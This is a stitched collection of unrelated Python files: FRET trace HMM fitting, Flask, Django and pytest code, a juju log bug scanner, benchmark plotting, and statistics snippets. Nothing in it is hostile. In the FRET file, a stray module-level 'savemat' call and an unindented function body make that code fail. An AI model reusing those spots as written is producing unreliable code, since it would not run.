    def client(self):
        # The underlying influxdb.InfluxDBClient (None before init_app).
        return self._client
#: Shared InfluxDB extension instance; call ``init_app(app)`` to configure it.
influx = InfluxDB()
def init_app(app):
    '''Initialize the InfluxDB Connection'''
    # Delegate to the shared extension instance, then record success.
    influx.init_app(app)
    app.logger.info('Initialized InfluxDB')
| StarcoderdataPython |
185980 | <reponame>stephlj/smFRETcode<filename>extras/pyhsmm_for_Traces/fret.py<gh_stars>1-10
from __future__ import division
import numpy as np
from scipy.io import loadmat, savemat
from scipy.stats import scoreatpercentile
import matplotlib.pyplot as plt
import os
from os.path import join, splitext, isfile, basename
from pyhsmm.models import WeakLimitStickyHDPHMM
from pyhsmm.basic.distributions import Gaussian
from pyhsmm.util.stats import cov
from config import getdirs
class Trace(object):
    '''
    A container object for trace experiments.

    Wraps a single-molecule FRET trace loaded from a MATLAB .mat file:
    holds the raw intensity data, fits a sticky HDP-HMM to it, exposes the
    fitted state/FRET sequences, and can plot or save the results.
    '''
    def __init__(self,matfilepath,start=0,end=None):
        # `start`/`end` select the frame window used for model fitting.
        self.matfilepath = matfilepath
        self.start = int(start)
        self.end = int(end) if end is not None else None
        self.name = _name_from_matfilepath(matfilepath)

        # load matfile
        mat = loadmat(matfilepath)

        # add model_data: rows are frames, columns are (green, red) intensity
        self.model_data = \
            np.hstack((mat['unsmoothedGrI'].T,mat['unsmoothedRedI'].T)
            )[self.start:self.end]

        # we start out with no model
        self.model = None

        # add everything from the matlab dict to this instance
        # (skips MATLAB's '__header__'/'__version__'/'__globals__' entries)
        for k, v in mat.items():
            if not k.startswith('__'):
                self.__dict__[k] = np.squeeze(v)

    ### model fitting

    def run_gibbs(self,niter):
        """Run `niter` Gibbs sweeps, then fix the MAP state sequence via Viterbi."""
        if self.model is None:
            self.reset_model()
        for itr in xrange(niter):
            self.model.resample_model()
        self.model.states_list[0].Viterbi()

    def reset_model(self):
        """Discard any previous fit and attach the data to a fresh model."""
        self.model = self._make_model()
        self.model.add_data(self.model_data)

    def _make_model(self):
        # Build a sticky HDP-HMM with Gaussian observations over (green, red).
        data = self.model_data

        # The parameters are:
        # Gaussian observation distributions (ellipses in red-green intensity space)
        # mu_0 and sigma parameterize our prior belief about the means and sigma of each state
        # nu_0 expresses your confidence in the prior--it's the number of data points that
        # you claim got you these prior parameters. Nu_0 has to be strictly bigger than the
        # number of dimensions (2, in our case). You could do 2.01.
        # The nominal covariance is sigma_0/nu_0, so hence the 3 in sigma_0.
        # kappa_0: Uncertainty in the mean should be related to uncertainty in the covariance.
        # kappa_0 is an amplitude for that. Smaller number means other states' means will be
        # further away.
        obs_hypparams = dict(
            mu_0=data.mean(0),
            sigma_0=3.*cov(data),
            nu_0=3.,
            kappa_0=0.5,
        )

        # In the function call below:
        # (1) alpha and gamma bias how many states there are. We're telling it to expect
        # one state (conservative)
        # (2) kappa controls the self-transition bias. Bigger number means becomes more expensive
        # for states to non-self-transition (that is, change to a different state).
        model = WeakLimitStickyHDPHMM(
            alpha=1.,gamma=1.,init_state_distn='uniform',
            kappa=500.,
            obs_distns=[Gaussian(**obs_hypparams) for _ in range(10)],
        )

        return model

    ### model fit results

    @property
    def model_stateseq(self):
        # Per-frame discrete state labels from the fitted model.
        return self.model.stateseqs[0]

    @property
    def model_durations(self):
        # Dwell time (in frames) of each visited state.
        return self.model.durations[0]

    @property
    def model_stateseq_norep(self):
        # State sequence with consecutive repeats collapsed.
        return self.model.stateseqs_norep[0]

    @property
    def model_redgreenseq(self):
        # construct corresponding mean sequence
        m = self.model
        return np.array([m.obs_distns[state].mu for state in self.model_stateseq])

    @property
    def model_fretseq(self):
        # FRET efficiency = red / (red + green) of the fitted state means.
        g, r = self.model_redgreenseq.T
        return r/(r+g)

    ### plotting

    def model_fretplot(self):
        """Plot raw and fitted intensities (top) and FRET values (bottom)."""
        raw_g, raw_r = self.unsmoothedGrI, self.unsmoothedRedI
        raw_fretseq = raw_r/(raw_r+raw_g)

        # Model values only cover the fitted [start, end) window.
        t_model = np.arange(self.start, self.end if self.end is not None else self.unsmoothedGrI.shape[0])
        g, r = self.model_redgreenseq.T
        fretseq = r/(r+g)

        fig, (ax1, ax2) = plt.subplots(2,1,figsize=(12,6), sharex=True)

        plt.subplot(ax1)
        # plt.title('intensities')
        fig.suptitle(self.name)

        # plot raw values
        plt.plot(raw_g,'g-',alpha=0.5)
        plt.plot(raw_r,'r-',alpha=0.5)

        # plot model values
        plt.plot(t_model,g,'g--',linewidth=2)
        plt.plot(t_model,r,'r--',linewidth=2)
        plt.xlabel('Frame')
        plt.ylabel('Intensity (a.u.)')

        plt.subplot(ax2)
        # plt.title('fret values')

        # plot raw values
        plt.plot(raw_fretseq,'k-',alpha=0.5)

        # plot model values
        plt.plot(t_model,fretseq,'b-')

        # set ylim to handle outliers
        plt.ylim(scoreatpercentile(raw_fretseq,5)-0.2,scoreatpercentile(raw_fretseq,95)+0.2)
        plt.xlabel('Frame')
        plt.ylabel('FRET')
        plt.xlim(0,raw_g.shape[0])

        # fig.suptitle(self.name)

    ### saving to matfile

    def save_matfile(self,matfiledir=None):
        """Save the raw data plus model-fit results to a .mat file.

        NOTE(review): the default path uses '<name>Results' while an explicit
        `matfiledir` uses '<name>_Results' — confirm the asymmetry is intended.
        """
        if matfiledir is None:
            mkdir('Results')
            matfilepath = join('Results',self.name+'Results')
        else:
            matfilepath = join(matfiledir,self.name+'_Results')
        tosave = ['start','unsmoothedGrI','unsmoothedRedI',
                'rawGrI','rawRedI','unsmoothedFRET','FRET','RedI','GrI',
                'model_data','fps','t_Inj']
        mdict = {key:self.__dict__[key] for key in tosave}
        mdict.update({
            'model_stateseq':self.model_stateseq,
            'model_stateseq_norep':self.model_stateseq_norep,
            'model_durations':self.model_durations,
            'model_redgreenseq':self.model_redgreenseq,
            'model_fretseq':self.model_fretseq,
        })
        savemat(matfilepath,mdict)
savemat(matfilepath,mdict)
def load_experiment(expname, datadir=None, resultsdir=None):
    '''
    Given an experiment name, returns a dict where keys are trace names and
    values are corresponding Traces.

    Reads the experiment's 'goodtraces.txt' file, if it exists, and only
    includes in the returned dict traces whose lines do not start with '#'.

    # Example #
        traces = load_experiment('wtWB')
        model.add_data(traces['Spot1_186_141208'].model_data)
    '''
    default_datadir, default_resultsdir = getdirs()
    if datadir is None:
        datadir = default_datadir
    if resultsdir is None:
        resultsdir = default_resultsdir

    goodfile = join(resultsdir, expname, 'goodtraces.txt')
    if not isfile(goodfile):
        raise ValueError('Did not find goodtraces file: %s' % goodfile)

    # parse goodtraces.txt, create corresponding Traces
    with open(goodfile, 'r') as infile:
        lines = infile.readlines()
    traces = {}
    for line in lines:
        if line.startswith('#'):
            continue
        tokens = line.split()
        # First token is the relative .mat path; the rest are key=value pairs
        # forwarded to the Trace constructor (e.g. start=100 end=500).
        matfilepath = join(datadir, tokens[0])
        kwds = dict(pair.split('=') for pair in tokens[1:])
        traces[_name_from_matfilepath(matfilepath)] = Trace(matfilepath, **kwds)
    return traces
def load_trace(datadir, tracename):
    '''
    Given a trace name, returns the corresponding Trace object.

    # Example #
        trace = load_trace('Spot1_186_141208')
        model.add_data(trace.model_data)
    '''
    # Undo the '<dir>_Spot<id>' mangling applied by _name_from_matfilepath.
    parts = tracename.split('_Spot', 1)
    wanted = 'Spot' + parts[1] + '.mat'
    subdir = join(datadir, parts[0])
    for root, _dirnames, filenames in os.walk(subdir):
        for candidate in filenames:
            if candidate == wanted:
                return Trace(join(root, candidate))
def _name_from_matfilepath(f):
assert not f.endswith('/')
rest, filename = os.path.split(f)
_, dirname = os.path.split(rest)
spot_id, _ = splitext(filename)
return dirname + '_' + spot_id
def mkdir(path):
    """Create *path* (and parents); ignore the error if it already exists as a directory."""
    # from http://stackoverflow.com/questions/600268/mkdir-p-functionality-in-python
    import errno
    try:
        os.makedirs(path)
    except OSError as err:
        # Re-raise unless this is "already exists" and the entry is a directory.
        if err.errno != errno.EEXIST or not os.path.isdir(path):
            raise
| StarcoderdataPython |
1794299 | <reponame>amazingguni/flask-ddd
from app.catalog.domain.category import Category
from app.catalog.domain.product import Product
from app.catalog.infra.repository.sql_product_repository import SqlProductRepository
def test_save(db_session):
    """Persisting a product stores it with its name intact."""
    # Given
    snack = Product(name='꼬북칩', price=1000, detail='바삭하고 맛이 있지요')
    # When
    SqlProductRepository(db_session).save(snack)
    # Then
    assert db_session.query(Product).first().name == '꼬북칩'
def test_save_with_categories(db_session):
    """Saving a product also persists its attached categories."""
    # Given
    snack = Product(name='꼬북칩', price=1000, detail='바삭하고 맛이 있지요')
    snack.categories.extend([Category(name='제과'), Category(name='어린이')])
    # When
    SqlProductRepository(db_session).save(snack)
    # Then
    saved = db_session.query(Product).first()
    assert saved.name == '꼬북칩'
    assert len(saved.categories) == 2
    assert {category.name for category in saved.categories} == {'제과', '어린이'}
def test_remove_by_id(db_session):
    """remove_by_id deletes the previously persisted product."""
    # Given
    snack = Product(name='꼬북칩', price=1000, detail='바삭하고 맛이 있지요')
    db_session.add(snack)
    db_session.commit()
    assert db_session.query(Product).count() == 1
    # When
    SqlProductRepository(db_session).remove_by_id(snack.id)
    # Then
    assert db_session.query(Product).count() == 0
def test_find_all(db_session):
    """find_all returns every stored product."""
    # Given
    db_session.add_all(
        Product(name=f'꼬북칩 {i}', price=1000, detail='바삭하고 맛이 있지요')
        for i in range(1, 6))
    db_session.commit()
    # When
    found = SqlProductRepository(db_session).find_all()
    # Then
    assert len(found) == 5
def test_find_by_id(db_session):
    """find_by_id returns the product with the matching primary key."""
    # Given
    db_session.add_all(
        Product(name=f'꼬북칩 {i}', price=1000, detail='바삭하고 맛이 있지요')
        for i in range(1, 6))
    db_session.commit()
    # When
    found = SqlProductRepository(db_session).find_by_id(2)
    # Then
    assert found.id == 2
    assert found.name == '꼬북칩 2'
def test_find_by_category(pre_data_db_session):
    """find_by_category pages the products belonging to the given category."""
    repository = SqlProductRepository(pre_data_db_session)
    electronics = pre_data_db_session.query(
        Category).filter(Category.name == '전자제품').first()
    stationery = pre_data_db_session.query(
        Category).filter(Category.name == '필기구').first()
    # When
    electronics_products = repository.find_by_category(electronics, 0, 10)
    stationery_products = repository.find_by_category(stationery, 0, 10)
    # Then
    assert len(electronics_products) == 2
    assert len(stationery_products) == 2
def test_counts_by_category(db_session):
    """counts_by_category tallies products per category.

    BUG FIX: the products added in the loops were never committed, unlike
    every other test in this file; commit before querying so the counts do
    not depend on session autoflush behaviour.
    """
    repository = SqlProductRepository(db_session)
    category_1 = Category(name='제과')
    category_2 = Category(name='아동')
    db_session.add_all([category_1, category_2])
    db_session.commit()
    for i in range(1, 6):
        db_session.add(
            Product(name=f'꼬북칩 {i}', price=1000, detail='바삭하고 맛이 있지요', categories=[category_1, category_2]))
    for i in range(1, 21):
        db_session.add(
            Product(name=f'장난감 {i}', price=2000, detail='재미있지요', categories=[category_2]))
    db_session.commit()
    # When / Then: 5 products in category_1, 5 + 20 in category_2.
    assert repository.counts_by_category(category_1) == 5
    assert repository.counts_by_category(category_2) == 25
| StarcoderdataPython |
1677936 | <filename>src/lightning_callbacks/rec_err_evaluator.py
import torch
from pytorch_lightning.callbacks import Callback
from pytorch_lightning import Trainer
from lightning_modules.base_generative_module import BaseGenerativeModule
from metrics.rec_err import mean_per_image_se
class RecErrEvaluator(Callback):
    """Logs the mean per-image reconstruction error after each validation batch."""

    def on_validation_batch_end(
            self,
            _trainer: Trainer,
            pl_module: BaseGenerativeModule,
            outputs: tuple[torch.Tensor, torch.Tensor],
            batch: torch.Tensor,
            _batch_idx: int,
            _dataloader_idx: int) -> None:
        # `outputs` is (latents/loss, reconstructed images); we only need the images.
        reconstructions = outputs[1]
        assert batch.size() == reconstructions.size()
        batch = batch.to(pl_module.device)
        error = mean_per_image_se(batch, reconstructions)
        pl_module.log('rec_err', error, prog_bar=False, on_epoch=True)
| StarcoderdataPython |
3203824 | #1: Syntax Errors
def helloworld():
    """Exercise 1: a function free of syntax errors."""
    greeting = 'Hello World!'
    return greeting
#2: Runtime Errors
def math(b, c):
    """Exercise 2: integer division demo (raises ZeroDivisionError for b or c == 0).

    NOTE: the name shadows the stdlib `math` module — kept for the exercise.
    """
    return (10 // b) + (10 // c) + 10
#3: Logic Errors
def ticketbooth(age):
    """Exercise 3: free entry only for ages strictly between 5 and 10."""
    if 5 < age < 10:
        return 'Free ticket!'
    return 'You gotta pay!'
| StarcoderdataPython |
199844 | <reponame>Riteme/test<filename>oi/51nod/P1065/gen.py<gh_stars>1-10
#!/usr/bin/env pypy
from sys import argv
from random import *
n, m = map(int, argv[1:])
print n
print " ".join(map(str, [randint(-m, m) for i in xrange(n)]))
| StarcoderdataPython |
3277371 | #!/usr/bin/python3
from common import (
constants,
)
from common.searchtools import (
FileSearcher,
)
from common.known_bugs_utils import (
add_known_bug,
BugSearchDef,
)
from juju_common import (
JUJU_LOG_PATH
)
# NOTE: only LP bugs supported for now
BUG_SEARCHES = [
    BugSearchDef(
        # Matches uniter startup failures caused by stale relation state
        # (captures the unit name and the offending relation id).
        (r'.* manifold worker .+ error: failed to initialize uniter for '
         r'"(\S+)": cannot create relation state tracker: cannot remove '
         r'persisted state, relation (\d+) has members'),
        bug_id="1910958",
        hint="manifold worker returned unexpected error",
        reason=("Unit {} failed to start due to members in relation {} that "
                "cannot be removed."),
        # Regex capture groups substituted into `reason` (1-indexed).
        reason_value_render_indexes=[1, 2],
        ),
    ]
def detect_known_bugs():
    """Scan the juju unit logs for known-bug signatures and record any matches."""
    data_source = f"{JUJU_LOG_PATH}/*.log"
    if constants.USE_ALL_LOGS:
        data_source = f"{data_source}*"

    searcher = FileSearcher()
    for bugdef in BUG_SEARCHES:
        searcher.add_search_term(bugdef, data_source)

    results = searcher.search()
    for bugdef in BUG_SEARCHES:
        hits = results.find_by_tag(bugdef.tag)
        if not hits:
            continue
        # Render the human-readable reason from the first match only.
        add_known_bug(bugdef.tag, bugdef.render_reason(hits[0]))
if __name__ == "__main__":
detect_known_bugs()
| StarcoderdataPython |
3340497 | <reponame>asonnino/key-transparency<filename>scripts/benchmark/plot.py
from collections import defaultdict
from re import findall, search, split
import matplotlib.pyplot as plt
import matplotlib.ticker as tick
from glob import glob
from itertools import cycle
from benchmark.utils import PathMaker
from benchmark.config import PlotParameters
from benchmark.aggregate import LogAggregator
@tick.FuncFormatter
def default_major_formatter(x, pos):
    """Axis tick formatter: values >= 1000 rendered as '<n>k'."""
    if pos is None:
        return
    return f'{x/1000:.0f}k' if x >= 1_000 else f'{x:.0f}'
@tick.FuncFormatter
def sec_major_formatter(x, pos):
    """Axis tick formatter: millisecond values rendered as seconds (one decimal)."""
    return None if pos is None else f'{float(x)/1000:.1f}'
@tick.FuncFormatter
def mb_major_formatter(x, pos):
    """Axis tick formatter: thousands separators, no decimals."""
    return None if pos is None else f'{x:,.0f}'
class PlotError(Exception):
    """Raised when plot input data is missing or malformed."""
class Ploter:
    """Renders latency and throughput graphs from aggregated benchmark logs."""

    def __init__(self, filenames):
        """Load the raw text of every aggregate log file.

        Commas (thousands separators) are stripped so the numeric regexes
        below see plain integers.

        Raises:
            PlotError: if no filenames are given or a file cannot be read.
        """
        if not filenames:
            raise PlotError('No data to plot')

        self.results = []
        try:
            for filename in filenames:
                with open(filename, 'r') as f:
                    self.results += [f.read().replace(',', '')]
        except OSError as e:
            # Chain the original OSError for easier debugging.
            raise PlotError(f'Failed to load log files: {e}') from e

    def _natural_keys(self, text):
        """Sort key that orders embedded integers numerically ('x10' after 'x9')."""
        def try_cast(text): return int(text) if text.isdigit() else text
        # Raw string: '(\d+)' without r-prefix is an invalid escape sequence
        # (SyntaxWarning on Python 3.12+).
        return [try_cast(c) for c in split(r'(\d+)', text)]

    def _tps(self, data):
        """Return ([tps...], [stdev...]) parsed from one result file."""
        values = findall(r' TPS: (\d+) \+/- (\d+)', data)
        values = [(int(x), int(y)) for x, y in values]
        return list(zip(*values))

    def _latency(self, data, scale=1):
        """Return ([latency...], [stdev...]) from one result file, divided by *scale*."""
        values = findall(r' Latency: (\d+) \+/- (\d+)', data)
        values = [(float(x)/scale, float(y)/scale) for x, y in values]
        return list(zip(*values))

    def _variable(self, data):
        """Return the x-axis values (one per 'Variable value: X=' line)."""
        return [int(x) for x in findall(r'Variable value: X=(\d+)', data)]

    def _plot(self, x_label, y_label, y_axis, z_axis, type, y_max=None):
        """Draw one errorbar series per loaded result and save as pdf + png.

        Args:
            x_label, y_label: axis labels (y_label is a one-element list).
            y_axis: callable extracting (values, errors) from a result string.
            z_axis: callable building the legend label for a result string.
            type: output-file tag; also selects the y-axis formatter
                ('latency' plots are shown in seconds).
            y_max: optional upper bound for the y axis.
        """
        plt.figure(figsize=(6.4, 2.4))
        markers = cycle(['o', 'v', 's', 'p', 'D', 'P'])
        self.results.sort(key=self._natural_keys, reverse=(type == 'tps'))
        for result in self.results:
            y_values, y_err = y_axis(result)
            x_values = self._variable(result)
            if len(y_values) != len(y_err) or len(y_err) != len(x_values):
                raise PlotError('Unequal number of x, y, and y_err values')

            plt.errorbar(
                x_values, y_values, yerr=y_err, label=z_axis(result),
                linestyle='dotted', marker=next(markers), capsize=3
            )

        plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1), ncol=2)
        # NOTE(review): `xmin` is the legacy keyword; recent matplotlib
        # prefers plt.xlim(left=0) — confirm the pinned matplotlib version.
        plt.xlim(xmin=0)
        plt.ylim(bottom=0, top=y_max)
        plt.xlabel(x_label, fontweight='bold')
        plt.ylabel(y_label[0], fontweight='bold')
        plt.xticks(weight='bold')
        plt.yticks(weight='bold')
        plt.grid()
        ax = plt.gca()
        ax.xaxis.set_major_formatter(default_major_formatter)
        ax.yaxis.set_major_formatter(default_major_formatter)
        if 'latency' in type:
            ax.yaxis.set_major_formatter(sec_major_formatter)
        for x in ['pdf', 'png']:
            plt.savefig(PathMaker.plot_file(type, x), bbox_inches='tight')

    @staticmethod
    def nodes(data):
        """Legend label for a committee-size (node-count) series."""
        batch_size = search(r'Batch size: (\d+)', data).group(1)
        x = search(r'Committee size: (\d+)', data).group(1)
        f = search(r'Faults: (\d+)', data).group(1)
        faults = f' - {f} faulty' if f != '0' else ''
        return f'{x} nodes (batch size: {batch_size}){faults}'

    @staticmethod
    def shards(data):
        """Legend label for a shards-per-node (scalability) series."""
        x = search(r'Shards per node: (\d+)', data).group(1)
        f = search(r'Faults: (\d+)', data).group(1)
        faults = f'({f} faulty)' if f != '0' else ''
        return f'{x} shards {faults}'

    @staticmethod
    def max_latency(data):
        """Legend label for a latency-capped throughput series."""
        x = search(r'Max latency: (\d+)', data).group(1)
        f = search(r'Faults: (\d+)', data).group(1)
        faults = f'({f} faulty)' if f != '0' else ''
        return f'Latency cap: {int(x):,} ms {faults}'

    @classmethod
    def plot_latency(cls, files, scalability, y_max=None):
        """Plot latency vs throughput for the given aggregate files."""
        assert isinstance(files, list)
        assert all(isinstance(x, str) for x in files)
        z_axis = cls.shards if scalability else cls.nodes
        x_label = 'Throughput (tx/s)'
        y_label = ['Latency (s)']
        ploter = cls(files)
        ploter._plot(
            x_label, y_label, ploter._latency, z_axis, 'latency', y_max
        )

    @classmethod
    def plot_tps(cls, files, scalability):
        """Plot throughput vs committee size (or shards when scaling)."""
        assert isinstance(files, list)
        assert all(isinstance(x, str) for x in files)
        z_axis = cls.max_latency
        x_label = 'Shards per authority' if scalability else 'Committee size'
        y_label = ['Throughput (tx/s)']
        ploter = cls(files)
        ploter._plot(x_label, y_label, ploter._tps, z_axis, 'tps', y_max=None)

    @classmethod
    def plot(cls, params_dict):
        """Aggregate the logs described by *params_dict*, then emit both graphs."""
        try:
            params = PlotParameters(params_dict)
        except PlotError as e:
            raise PlotError('Invalid nodes or bench parameters', e)

        # Aggregate the logs.
        LogAggregator(params.max_latency).print()

        # Make the latency, tps, and robustness graphs.
        iterator = params.shards if params.scalability() else params.nodes
        latency_files, tps_files = [], []
        for f in params.faults:
            for x in iterator:
                latency_files += glob(
                    PathMaker.agg_file(
                        'latency',
                        f,
                        x if not params.scalability() else params.nodes[0],
                        x if params.scalability() else params.shards[0],
                        params.collocate,
                        'any',
                        params.batch_size,
                    )
                )
            for l in params.max_latency:
                tps_files += glob(
                    PathMaker.agg_file(
                        'tps',
                        f,
                        'x' if not params.scalability() else params.nodes[0],
                        'x' if params.scalability() else params.shards[0],
                        params.collocate,
                        'any',
                        params.batch_size,
                        max_latency=l,
                    )
                )

        y_max = 30_000
        cls.plot_latency(latency_files, params.scalability(), y_max)
        cls.plot_tps(tps_files, params.scalability())
| StarcoderdataPython |
3253304 | <reponame>spacesmap/2
from django.db import models
from django.utils.translation import ugettext_lazy as _
# Choices for City.level_type: depth of the region in the administrative tree.
CITY_LEVEL_TYPE = (
    (0, _("China")),
    (1, _("Province")),
    (2, _("City")),
    (3, _("Country")),
)
class City(models.Model):
    """A node in the administrative-region tree, linked upward via ``parent``."""

    # Convenience constants matching the CITY_LEVEL_TYPE choice keys.
    CHINA = 0
    PROVINCE = 1
    CITY = 2
    COUNTRY = 3

    name = models.CharField(_('Name'), max_length=40)
    short_name = models.CharField(_('Short name'), max_length=40)
    level_type = models.PositiveIntegerField(_('Level type'),
                                             choices=CITY_LEVEL_TYPE)
    city_code = models.CharField(_('City code'), max_length=7)
    zip_code = models.CharField(_('Zip code'), max_length=7)
    lat = models.CharField(_('Latitude'), max_length=20)
    lng = models.CharField(_('Longitude'), max_length=20)
    pinyin = models.CharField(_('Chinese Pinyin'), max_length=40)
    status = models.BooleanField(_('status'), default=True)
    # NOTE(review): Django >= 2.0 requires an explicit on_delete argument on
    # ForeignKey, so this line only works on Django < 2.0 — confirm the
    # project's target Django version.
    parent = models.ForeignKey('self', null=True)

    def __str__(self):
        return self.name
| StarcoderdataPython |
1643924 | <filename>note24/order_system (3)/src/order_system_pkg/Promotion.py
#######################################################
#
# Promotion.py
# Python implementation of the Class Promotion
# Generated by Enterprise Architect
# Created on: 20-4��-2021 13:21:58
# Original author: 70748
#
#######################################################
from abc import ABC, abstractmethod
# from .Order import Order
class Promotion(ABC):
    """Abstract discount strategy (Strategy pattern) applied to an Order."""

    @abstractmethod
    def discount(self, order: "Order"):
        """Return the discount for *order*; must be implemented by subclasses."""
        pass
| StarcoderdataPython |
81485 | <reponame>mattkw/dl<filename>adv/linyou.py.z.py
import adv_test
import linyou
import slot.d.wind
def module():
    """Entry point used by adv_test: return the adventurer class to simulate."""
    return Linyou_best
class Linyou_best(linyou.Linyou):
    # Display metadata for the simulation report.
    name = 'Linyou'
    comment = '2in1 ; Zephyr'

    def pre(this):
        # No pre-combat setup needed for this build.
        pass
if __name__ == '__main__':
    conf = {}
    # a better acl, but hit threshold of lose one s3.
    # ACL (action control list): skill-priority rules parsed by the simulator.
    conf['acl'] = """
    `s2, s1.charged>=s1.sp-440
    `s1
    `s2, seq=4
    `s3, seq=5
    """
    adv_test.test(module(), conf, verbose=0, mass=0)
| StarcoderdataPython |
1785998 | <reponame>vincenzodentamaro/music_genre_classification
import json
from glob import glob
import numpy as np
from sklearn.metrics import f1_score, average_precision_score
from sklearn.model_selection import train_test_split
from models import rnn_classifier, transformer_classifier
from prepare_data import get_id_from_path, labels_to_vector, random_crop
from tqdm import tqdm
import matplotlib.pyplot as plt
from sklearn.metrics import precision_recall_curve
def chunker(seq, size):
    """Yield successive slices of *seq* of length *size* (last may be shorter)."""
    for start in range(0, len(seq), size):
        yield seq[start:start + size]
if __name__ == "__main__":
from collections import Counter
transformer_h5 = "transformer.h5"
transformer_v2_h5 = "transformer_v2.h5"
rnn_h5 = "rnn.h5"
batch_size = 128
epochs = 5
CLASS_MAPPING = json.load(open("/media/ml/data_ml/fma_metadata/mapping.json"))
id_to_genres = json.load(open("/media/ml/data_ml/fma_metadata/tracks_genre.json"))
id_to_genres = {int(k): v for k, v in id_to_genres.items()}
base_path = "/media/ml/data_ml/fma_large"
files = sorted(list(glob(base_path + "/*/*.npy")))
files = [x for x in files if id_to_genres[int(get_id_from_path(x))]]
labels = [id_to_genres[int(get_id_from_path(x))] for x in files]
print(len(labels))
samples = list(zip(files, labels))
strat = [a[-1] for a in labels]
cnt = Counter(strat)
strat = [a if cnt[a] > 2 else "" for a in strat]
train, val = train_test_split(
samples, test_size=0.2, random_state=1337, stratify=strat
)
transformer_model = transformer_classifier(n_classes=len(CLASS_MAPPING))
transformer_v2_model = transformer_classifier(n_classes=len(CLASS_MAPPING))
rnn_model = rnn_classifier(n_classes=len(CLASS_MAPPING))
transformer_model.load_weights(transformer_h5)
transformer_v2_model.load_weights(transformer_v2_h5)
rnn_model.load_weights(rnn_h5)
all_labels = []
transformer_all_preds = []
transformer_v2_all_preds = []
rnn_all_preds = []
for batch_samples in tqdm(
chunker(val, size=batch_size), total=len(val) // batch_size
):
paths, labels = zip(*batch_samples)
all_labels += [labels_to_vector(x, CLASS_MAPPING) for x in labels]
crop_size = np.random.randint(128, 256)
repeats = 16
transformer_Y = 0
transformer_v2_Y = 0
rnn_Y = 0
for _ in range(repeats):
X = np.array([random_crop(np.load(x), crop_size=crop_size) for x in paths])
transformer_Y += transformer_model.predict(X) / repeats
transformer_v2_Y += transformer_v2_model.predict(X) / repeats
rnn_Y += rnn_model.predict(X) / repeats
transformer_all_preds.extend(transformer_Y.tolist())
transformer_v2_all_preds.extend(transformer_v2_Y.tolist())
rnn_all_preds.extend(rnn_Y.tolist())
T_Y = np.array(transformer_all_preds)
T_v2_Y = np.array(transformer_v2_all_preds)
R_Y = np.array(rnn_all_preds)
Y = np.array(all_labels)
trsf_ave_auc_pr = 0
trsf_v2_ave_auc_pr = 0
rnn_ave_auc_pr = 0
total_sum = 0
for label, i in CLASS_MAPPING.items():
if np.sum(Y[:, i]) > 0:
trsf_auc = average_precision_score(Y[:, i], T_Y[:, i])
trsf_v2_auc = average_precision_score(Y[:, i], T_v2_Y[:, i])
rnn_auc = average_precision_score(Y[:, i], R_Y[:, i])
print(label, np.sum(Y[:, i]))
print("transformer :", trsf_auc)
print("transformer v2:", trsf_v2_auc)
print("rnn :", rnn_auc)
print("")
trsf_ave_auc_pr += np.sum(Y[:, i]) * trsf_auc
trsf_v2_ave_auc_pr += np.sum(Y[:, i]) * trsf_v2_auc
rnn_ave_auc_pr += np.sum(Y[:, i]) * rnn_auc
total_sum += np.sum(Y[:, i])
if label == "Hip-Hop":
precision, recall, _ = precision_recall_curve(Y[:, i], T_Y[:, i])
average_precision = average_precision_score(Y[:, i], T_Y[:, i])
plt.figure()
plt.step(recall, precision, where="post")
plt.xlabel("Recall")
plt.ylabel("Precision")
plt.ylim([0.0, 1.05])
plt.xlim([0.0, 1.0])
plt.title("Average precision score ".format(average_precision))
plt.savefig("plot.png")
trsf_ave_auc_pr /= total_sum
trsf_v2_ave_auc_pr /= total_sum
rnn_ave_auc_pr /= total_sum
print("transformer micro-average : ", trsf_ave_auc_pr)
print("transformer v2 micro-average : ", trsf_v2_ave_auc_pr)
print("rnn micro-average : ", rnn_ave_auc_pr)
| StarcoderdataPython |
1758396 | from kolibri.utils.cli import main
if __name__ == "__main__":
main(["start","--port=80","--foreground"])
| StarcoderdataPython |
3300729 | <gh_stars>0
from django.contrib import admin
from django.contrib import messages
from .models import IncludeBootstrap
from django.conf import settings
class IncludeBootstrapAdmin(admin.ModelAdmin):
    """Admin for IncludeBootstrap that keeps at most one active row per library."""
    fields = ('library', 'version', 'url_pattern', 'integrity', 'url', 'active')
    # Derived fields are computed elsewhere and must not be hand-edited.
    readonly_fields = ('integrity', 'url')
    list_display = ('library', 'version', 'active')

    def save_model(self, request, obj, form, change):
        # When activating this row, deactivate every other active row of the
        # same library first, and warn the admin user about the side effect.
        # NOTE(review): the filter does not exclude obj itself; this relies on
        # obj not yet being stored as active (new or previously inactive row)
        # — confirm for the edit-existing-active-row case.
        if obj.active and obj.__class__.objects.filter(library=obj.library, active=obj.active).exists():
            obj.__class__.objects.filter(library=obj.library, active=obj.active).update(active=False)
            messages.add_message(request, messages.WARNING,
                                 f'Please note! The object was activated and another library was deactivated.')
        super().save_model(request, obj, form, change)

# Register the admin only when the feature is enabled in project settings.
if getattr(settings, 'INCLUDE_BOOTSTRAP_SETTINGS', {}) and settings.INCLUDE_BOOTSTRAP_SETTINGS.get('use_db'):
    admin.site.register(IncludeBootstrap, IncludeBootstrapAdmin)
| StarcoderdataPython |
117075 | # Imports
from django.contrib import admin
from django.urls import path, include
# BEGIN
urlpatterns = [
path('admin/', admin.site.urls),
path('watchdog/', include('watchdog.urls')),
path('dashboard/', include('dashboard.urls')),
path('smarttasks/', include('smarttasks.urls')),
path('nursehouse/', include('nursehouse.urls')),
path('error/', include('error.urls')),
]
# END
if __name__ == '__main__':
pass | StarcoderdataPython |
130212 | <gh_stars>0
from src import core
if __name__ == "__main__":
n = core.FrequencyDbName.DAILY
assert n == "daily"
print(n)
print(repr(n))
x = core.FrequencyDbName("todo")
| StarcoderdataPython |
3345108 | <gh_stars>0
sns.pairplot(df)
corre=df.corr()
plt.figure(figsize=(5,5))
sns.heatmap(corre,cmap='plasma')
plt.title('correlations')
plt.show()
sns.violinplot(y='gender',x='height',data=df , color="0.8" )
sns.stripplot(y='gender',x='height',data=df , zorder=1 )
plt.show()
sns.violinplot(y='smoker_nonsmoker',x='height',data=df , color="0.8" )
sns.stripplot(y='smoker_nonsmoker',x='height',data=df , zorder=1 )
plt.show()
#Not normal (do the normality test if you want). So no t test. Let's go for non parametric
stat , pval = stats.mannwhitneyu( df.height[df.gender=='M'] ,
df.height[df.gender=='F'] )
print('Mann-Whitney rank test p-value for gender :' , pval)
stat , pval = stats.mannwhitneyu( df.height[df.smoker_nonsmoker=='NS'] ,
df.height[df.smoker_nonsmoker=='S'] )
print('Mann-Whitney rank test p-value for smoker :' , pval)
